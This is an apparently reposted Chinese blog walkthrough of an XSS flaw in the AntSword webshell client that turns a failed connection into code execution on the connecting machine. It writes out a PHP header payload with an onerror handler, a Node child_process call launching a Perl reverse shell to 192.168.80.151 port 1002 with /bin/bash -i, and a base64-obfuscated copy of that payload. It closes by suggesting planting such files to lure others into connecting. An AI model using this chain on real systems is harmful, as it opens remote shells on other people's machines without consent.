2. 程式人生 > >蟻劍xss漏洞,獲取***者shell

蟻劍xss漏洞,獲取***者shell

阿新 發佈:2019-04-15
stdout 當我 .com buffer ash ges 沒事 深入 get

今日在github上看到蟻劍暴露了一個xss漏洞,自己也經常使用蟻劍。同時在freebuf上也有一篇文章,關於蟻劍漏洞的。閑著沒事測試了一波。

一、漏洞成因

蟻劍shell遠程連接失敗時,蟻劍會返回錯誤信息,但因為使用的是html解析,導致xss漏洞。

用過蟻劍的童靴都清楚,當我們遠程連接寫好的webshell的時候,有時候可能因為shell書寫錯誤或者鏈接填寫不當的時候,會出現大堆的錯誤代碼。
技術分享圖片

該信息並沒有進行 XSS 保護,因此能夠利用 js 調用 perl 便可反彈***者的shell

很多時候我們不去註意,但這裏恰恰就是漏洞利用點。(漏洞往往就在你的眼皮地下,你只要向下看看就能找到。可惜我們只向前看,不向下看。)

二、漏洞驗證

鑒於本人對js沒有深入了解,只懂得些皮毛。這裏就直接引用別人寫好的shell了

(1)驗證xss漏洞的存在

<?php header(‘HTTP/1.1 500 <img src=# onerror=alert(1)>‘);?>

技術分享圖片

Head()函數,向客戶端發送原始的 HTTP 報頭。
當蟻劍遠程連接shell的時候就會觸發彈框。

(2)反彈***者shell

require(‘child_process‘).exec(‘perl -e \‘use Socket;$i="192.168.80.151";$p=1002;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};\‘‘,(error, stdout, stderr)=>{ alert(`stdout: ${stdout}`); });

將這些代碼進行base64加密

cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ3BlcmwgLWUgXCd1c2UgU29ja2V0OyRpPSIxOTIuMTY4LjgwLjE1MSI7JHA9MTAwMjtzb2NrZXQoUyxQRl9JTkVULFNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCJ0Y3AiKSk7aWYoY29ubmVjdChTLHNvY2thZGRyX2luKCRwLGluZXRfYXRvbigkaSkpKSl7b3BlbihTVERJTiwiPiZTIik7b3BlbihTVERPVVQsIj4mUyIpO29wZW4oU1RERVJSLCI+JlMiKTtleGVjKCIvYmluL2Jhc2ggLWkiKTt9O1wnJywoZXJyb3IsIHN0ZG91dCwgc3RkZXJyKT0+ewogICAgYWxlcnQoYHN0ZG91dDogJHtzdGRvdXR9YCk7CiAgfSk7

構造header

<?php

header("HTTP/1.1 406 Not <img src=# onerror=‘eval(new Buffer(`cmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWMoJ3BlcmwgLWUgXCd1c2UgU29ja2V0OyRpPSIxOTIuMTY4LjgwLjE1MSI7JHA9MTAwMjtzb2NrZXQoUyxQRl9JTkVULFNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCJ0Y3AiKSk7aWYoY29ubmVjdChTLHNvY2thZGRyX2luKCRwLGluZXRfYXRvbigkaSkpKSl7b3BlbihTVERJTiwiPiZTIik7b3BlbihTVERPVVQsIj4mUyIpO29wZW4oU1RERVJSLCI+JlMiKTtleGVjKCIvYmluL2Jhc2ggLWkiKTt9O1wnJywoZXJyb3IsIHN0ZG91dCwgc3RkZXJyKT0+ewogICAgYWxlcnQoYHN0ZG91dDogJHtzdGRvdXR9YCk7CiAgfSk7`,`base64`).toString())‘>");
?>

將其寫入被***中的網站目錄下
技術分享圖片

被***機監聽1002端口
技術分享圖片

***機蟻劍遠程連接

技術分享圖片

獲得***者shell
技術分享圖片

在最新的版本中, 修改了 toastr 可以輸出 html 的特點,以後均不支持輸出 html。建議及時更新到最新版本

三、總結

如果你檢測到了自己被上傳了webshell,不妨可以試一試這個漏洞,對方如果使用的是蟻劍,當對方連接你的時候,也是他上線的時候。或者在比賽(zhen shi)環境的時候,故意制造一個這樣的shell,誘惑一些小可愛連一下。

參考鏈接:
https://github.com/AntSwordProject/antSword/issues/147

蟻劍xss漏洞,獲取***者shell

相關推薦

xss漏洞獲取***shell

stdout 當我 .com buffer ash ges 沒事 深入 get 今日在github上看到蟻劍暴露了一個xss漏洞,自己也經常使用蟻劍。同時在freebuf上也有一篇文章,關於蟻劍漏洞的。閑著沒事測試了一波。 一、漏洞成因 蟻劍shell遠程連接失敗時,蟻劍會

微軟披露 IE 漏洞攻擊可以控制受影響系統

   Google 工程師發現 IE 中存在一個漏洞,攻擊者可以通過漏洞完全控制受害作業系統。 據分析,這是一個指令碼引擎記憶體損壞漏洞,影響所有受支援 Windows 上的 IE,包括 Windows 10 1809。該漏洞由 Google 威脅分析組的 Clem

比特幣DoS漏洞和超發漏洞技術分析攻擊或無法獲利

上週,bitcoin core 0.16.3 版本客戶端的突然釋出,以及開發者敦促大家儘快升級一事,令比特幣世界的人們感到了驚訝。表面上的原因,在於0.14-0.16.2版本客戶端中存在一個拒絕服務 (DoS) 向量需要被修補。到後來,我們才發現,在0.15-0.16.2版本core客戶端中的另一個

Java反序列化漏洞:在受限環境中從漏洞發現到獲取反向Shell

前言 Java反序列化漏洞可以說是Java安全的一塊心病,近年來更是在安全界“出盡風頭”。其實說到Java反序列化的問題,早在2015年年初的在AppSecCali大會上,兩名安全研究人員Chris Frohoff 和 Gabriel Lawrence發表了一篇題為《Marshallin

批量ssh登入獲取作業系統、CPU、記憶體、硬碟資訊<shell>

說明:該指令碼讀取machine.txt檔案中的機器名,然後批量ssh登入,獲取每臺機器的作業系統,CPU,記憶體,硬碟等資訊。 使用方法:將檔案儲存為sh,chmod +x filename 為該sh檔案賦予執行許可權。 for line in `cat machine.txt` do

Java Web使用過濾器防止Xss攻擊解決Xss漏洞

web.xml新增過濾器 <!-- 解決xss漏洞 --> <filter> <filter-name>xssFilter</filter-nam

從零學習安全測試XSS漏洞攻擊和防禦開始

WeTest 導讀 本篇包含了XSS漏洞攻擊及防禦詳細介紹,包括漏洞基礎、XSS基礎、編碼基礎、XSS Payload、XSS攻擊防禦。 第一部分:漏洞攻防基礎知識 XSS屬於漏洞攻防,我們要研究它就要了解這個領域的一些行話,這樣才好溝通交流。同時我建立了一個簡易的攻擊模型用於XSS漏洞學習。 1

shell獲取字串長度的方法獲取陣列元素個數獲取陣列元素陣列遍歷

有一個變數var,其值為abbbbsdadhkajsd,設它的長度為len,則用shell獲取此字串的長度,方法如下: len=${#var} 有一個數組A=(a b c d e f) ${A[0]}代表陣列A中的第一個元素a, ${A[@]}是陣列A中的全部元素, ${#

什麼是sql注入xss漏洞

            XSS(Cross Site Script)跨站指令碼攻擊,指惡意攻擊者往web頁面插入惡意指令碼程式碼,而程式對於使用者輸入內容未過濾,當用戶瀏覽該頁面時,嵌入其中的web裡面的指令碼程式碼會被執行,從而達到惡意攻擊使用者的特殊目的。因此,一般在表單

內容解析獲取聯絡人和簡訊資料

轉載請註明出處(萬分感謝!): https://blog.csdn.net/weixin_40790006/article/details/79981352package com.example.f405.contentresolvertest; import androi

後臺防止XSS注入禁止JS獲取COOKIE

1.PHP 5.2以下支援 header("Set-Cookie: hidden=value; httpOnly"); 2.PHP5.2以上支援 ini_set("session.cookie_httponly", 1); 3.相容全部PHP版本 setcookie("na

linux的C程式 呼叫 shell指令碼獲取shell的執行結果

linux下通過C執行命令的時候一半都是使用system()方法,但是該方法執行命令返回的值是-1或0,而有時候我們需要得到執行命令後的結果。可以使用管道實現 輸出到檔案流的函式是popen(),例如 FILE *isr; isr = popen("ls -l","r"

python實現QQ機器人(自己主動登錄獲取群消息發送群消息)

keep fine 繼續 fill iss data while [0 ssi 一次偶然的機會我看見了一個群裏的一個QQ號總是依據你所發的消息自己主動回復,當時非常感覺到奇妙。我知道能夠模擬登錄站點,沒想到居然也能模擬登錄QQ,首先自己想到的就是怎樣實現模擬登錄PC端的

2015-03-12---外觀模式建造模式(附代碼)觀察模式(附代碼)boost庫應用

思想 err map 函數 成功 each clu all 說我 今天白天主要看了boost庫的應用,主要是經常使用的一些庫,array,bind,function,regex,thread,unordered,ref,smartpointers庫,晚上看了看設計模式。

給定一個二叉樹獲取該二叉樹的寬度深度

prototype %d param unsigned right idt height push signed 題目: Description 給定一個二叉樹,獲取該二叉樹的寬度深度。 Prototype int GetBiNo

Oracle function實現根據輸入的日期以及天數獲取此日期之後的天數的工作日

eat log func code nbsp ber number rep reat 前提:在法定節日表(t_fdjr )中維護法定節日包括周六周天 /** * 功能描述:根據輸入的日期以及天數,獲取此日期之後的天數的工作日 * 輸入參數: * i_date YYYY-M

Java實現根據輸入的日期以及天數獲取此日期之後的天數的工作日

天數 數據庫 ger 獲取 reg static try rgs pan public static void main(String[] args) { List<String> list = new ArrayList<String

關於XSS漏洞的簡介以及分類

信任 基本 嵌入 contex html arch 思想 描述 .com 不得不說註入的時代已經過去了,最近xss貌似比較熱門。我就去惡補了一下,我表示我只是菜鳥,對xss不了解。所以從最基本的學起。 什麽xss漏洞? 一、XSS攻擊簡介 作為一種HTM

正則表達式的四大操作(匹配切割替換獲取

都沒有 第一次 擴展 判斷 區分 擴展表達式 string 個數 asc 這裏只介紹js中對正則表達式的相關操作,關於正則表達式的詳細介紹,請參考http://manual.phpv.net/regular_expression.html 一、js中正則表達式操作 1

獸哥出品---->XSS漏洞的原理與剖析

xss原理 xss攻擊 xss原理與剖析 xss Xss(跨站腳本攻擊) 今天 獸哥又給大家帶來一份幹貨,關於xss漏洞問題 Xss是一種基於html屬性的攻擊 這是一種比較簡單的方法 然而現在存在xss漏洞已經很少了 但是..註意 這裏我用到了但是